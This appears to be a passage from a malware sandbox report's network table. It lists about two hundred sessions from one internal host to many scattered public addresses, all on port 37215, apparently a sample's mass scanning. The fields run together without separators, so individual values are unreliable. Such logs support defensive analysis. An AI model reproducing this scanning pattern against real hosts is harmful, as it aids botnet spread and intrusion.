                                                  6572192.168.2.135524041.179.157.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6573192.168.2.1347116157.110.103.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6574192.168.2.1358300157.239.189.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6575192.168.2.1339296157.126.88.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6576192.168.2.1353268140.8.32.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6577192.168.2.1359490197.127.65.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6578192.168.2.1336714197.29.211.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6579192.168.2.1337858177.52.57.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6580192.168.2.1333368157.216.235.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6581192.168.2.134537841.67.6.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6582192.168.2.1340574197.108.197.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6583192.168.2.1339564197.166.202.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6584192.168.2.135670441.187.180.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6585192.168.2.1350258157.42.106.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6586192.168.2.1345248157.89.5.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6587192.168.2.133398041.214.215.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6588192.168.2.1360304197.144.34.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6589192.168.2.1356890157.67.41.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6590192.168.2.136015296.37.213.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6591192.168.2.1351720181.124.187.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6592192.168.2.134735041.182.246.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6593192.168.2.1352106157.226.229.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6594192.168.2.135208641.206.168.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6595192.168.2.1357552157.236.110.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6596192.168.2.1358090157.74.221.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6597192.168.2.1341628197.11.159.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6598192.168.2.1352344157.231.6.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6599192.168.2.1338366197.72.134.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6600192.168.2.135447041.126.178.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6601192.168.2.1332814157.242.53.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6602192.168.2.1336590157.117.221.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6603192.168.2.133699641.63.111.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6604192.168.2.1347494157.97.131.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6605192.168.2.1352426157.182.244.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6606192.168.2.134613641.109.238.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6607192.168.2.1349862157.106.159.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6608192.168.2.1350254197.174.82.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6609192.168.2.133379412.93.93.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6610192.168.2.1360726117.104.53.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6611192.168.2.135465641.29.253.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6612192.168.2.1346930130.68.10.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6613192.168.2.133796041.77.183.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6614192.168.2.1358478187.231.134.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6615192.168.2.1341130197.252.223.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6616192.168.2.1355766197.53.126.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6617192.168.2.133371041.253.39.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6618192.168.2.1347480197.15.77.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6619192.168.2.1342576157.92.37.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6620192.168.2.1338572157.99.39.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6621192.168.2.135451241.131.27.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6622192.168.2.133578443.78.125.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6623192.168.2.1338710157.108.249.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6624192.168.2.135637241.139.111.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6625192.168.2.1349448157.21.129.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6626192.168.2.134911441.226.27.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6627192.168.2.133987279.35.18.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6628192.168.2.1332796146.134.5.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6629192.168.2.1338688157.39.4.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6630192.168.2.135387071.165.225.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6631192.168.2.1352112197.254.155.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6632192.168.2.135696641.42.32.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6633192.168.2.135686878.145.159.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6634192.168.2.1341586195.92.35.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6635192.168.2.1352974131.90.90.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6636192.168.2.134298241.169.87.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6637192.168.2.134580641.115.152.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6638192.168.2.135510641.253.114.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6639192.168.2.1355406131.68.96.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6640192.168.2.1355426197.184.157.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6641192.168.2.1340554157.41.30.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6642192.168.2.133379841.46.19.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6643192.168.2.135687897.241.168.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6644192.168.2.1346170207.177.173.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6645192.168.2.134919641.9.228.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6646192.168.2.135975441.157.110.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6647192.168.2.1344420197.200.71.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6648192.168.2.1337442157.156.124.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6649192.168.2.134445886.152.222.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6650192.168.2.136039641.248.53.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6651192.168.2.1340352150.154.218.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6652192.168.2.1342800157.86.20.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6653192.168.2.1339358141.23.135.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6654192.168.2.135252849.166.149.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6655192.168.2.1337008197.55.132.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6656192.168.2.133312441.247.64.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6657192.168.2.135563641.4.196.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6658192.168.2.1356674197.212.134.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6659192.168.2.135366041.182.24.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6660192.168.2.135479641.167.96.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6661192.168.2.1360062197.143.46.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6662192.168.2.1360932157.60.5.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6663192.168.2.135794034.236.188.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6664192.168.2.133931241.35.189.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6665192.168.2.1332956118.149.30.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6666192.168.2.1335608197.160.78.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6667192.168.2.1333480197.179.23.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6668192.168.2.1346230157.76.4.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6669192.168.2.1348934111.215.116.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6670192.168.2.134204041.96.212.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6671192.168.2.1344398197.254.19.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6672192.168.2.135784041.9.10.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6673192.168.2.1348568157.95.190.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6674192.168.2.1352104157.252.44.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6675192.168.2.1347648195.193.216.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6676192.168.2.1338510157.44.32.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6677192.168.2.134197276.172.61.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6678192.168.2.1355922197.139.132.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6679192.168.2.1351558157.39.242.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6680192.168.2.1339100197.80.254.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6681192.168.2.1338724197.158.74.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6682192.168.2.1333380197.63.160.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6683192.168.2.135832079.192.113.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6684192.168.2.1349872157.153.196.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6685192.168.2.1341328157.71.141.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6686192.168.2.1354394197.35.102.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6687192.168.2.1352260183.210.218.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6688192.168.2.1352598151.109.237.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6689192.168.2.1354380157.204.186.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6690192.168.2.135913241.213.11.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6691192.168.2.133522041.187.174.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6692192.168.2.134744241.129.213.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6693192.168.2.1335164197.209.47.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6694192.168.2.1341604197.175.36.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6695192.168.2.1341958157.119.24.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6696192.168.2.135054041.166.76.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6697192.168.2.1347776197.229.241.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6698192.168.2.1333136157.183.170.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6699192.168.2.1343874197.206.240.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6700192.168.2.1334882157.236.196.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6701192.168.2.134545041.159.204.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6702192.168.2.1346358157.74.209.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6703192.168.2.1339044197.103.228.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6704192.168.2.134075241.71.137.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6705192.168.2.135360669.159.220.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6706192.168.2.135905041.75.94.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6707192.168.2.1349662148.118.22.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6708192.168.2.134263241.100.118.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6709192.168.2.1333244140.206.111.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6710192.168.2.1345080197.12.225.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6711192.168.2.135294641.37.196.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6712192.168.2.1338434157.228.212.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6713192.168.2.1357818190.28.158.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6714192.168.2.136012841.150.201.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6715192.168.2.1345196106.119.73.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6716192.168.2.133280441.80.238.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6717192.168.2.134090894.254.99.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6718192.168.2.1340676117.53.130.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6719192.168.2.1352414195.199.69.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6720192.168.2.1359700157.236.78.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6721192.168.2.1346918197.199.83.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6722192.168.2.1352294191.145.8.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6723192.168.2.1344354157.245.184.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6724192.168.2.1336266157.219.108.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6725192.168.2.134492246.171.112.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6726192.168.2.135280241.166.253.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6727192.168.2.1340512185.149.178.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6728192.168.2.1341578168.145.179.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6729192.168.2.135708441.41.103.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6730192.168.2.1360990197.119.230.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6731192.168.2.1335088141.177.231.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6732192.168.2.1357464183.138.194.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6733192.168.2.135560441.112.91.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6734192.168.2.136073041.169.137.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6735192.168.2.134171860.102.104.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6736192.168.2.1341788157.214.16.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6737192.168.2.1352338192.217.73.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6738192.168.2.133800441.198.44.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6739192.168.2.135011241.166.219.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6740192.168.2.1348574197.2.69.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6741192.168.2.1360762120.87.40.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6742192.168.2.135923841.116.19.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6743192.168.2.133865841.183.206.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6744192.168.2.1357224130.31.204.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6745192.168.2.134873896.67.205.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6746192.168.2.1335756122.60.235.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6747192.168.2.1351422197.216.42.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6748192.168.2.1356702157.63.10.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6749192.168.2.136040293.78.220.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6750192.168.2.1350614157.95.61.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6751192.168.2.1356096157.191.41.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6752192.168.2.1360878197.190.39.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6753192.168.2.1339288157.241.86.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6754192.168.2.1355156197.234.156.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6755192.168.2.133418041.125.57.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6756192.168.2.1345220157.39.1.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6757192.168.2.1347932157.160.54.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6758192.168.2.1352256157.207.62.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6759192.168.2.1341344197.42.45.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6760192.168.2.1349182157.143.131.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6761192.168.2.1335464157.143.139.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6762192.168.2.1334806197.131.128.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6763192.168.2.1355902157.190.83.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6764192.168.2.1341722159.164.9.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6765192.168.2.1351856157.2.182.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6766192.168.2.1352326194.197.193.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6767192.168.2.1339992166.121.94.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6768192.168.2.1338568171.105.94.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6769192.168.2.1356118157.160.129.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6770192.168.2.1342784157.147.232.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6771192.168.2.1349704157.181.105.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6772192.168.2.1335656197.73.234.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6773192.168.2.135250259.17.201.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6774192.168.2.1337514193.234.57.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6775192.168.2.1355774195.171.79.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6776192.168.2.135648641.241.52.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6777192.168.2.134179441.111.252.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6778192.168.2.133475841.187.195.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6779192.168.2.1352606157.52.243.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6780192.168.2.133704441.96.28.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6781192.168.2.1339592197.160.34.24237215
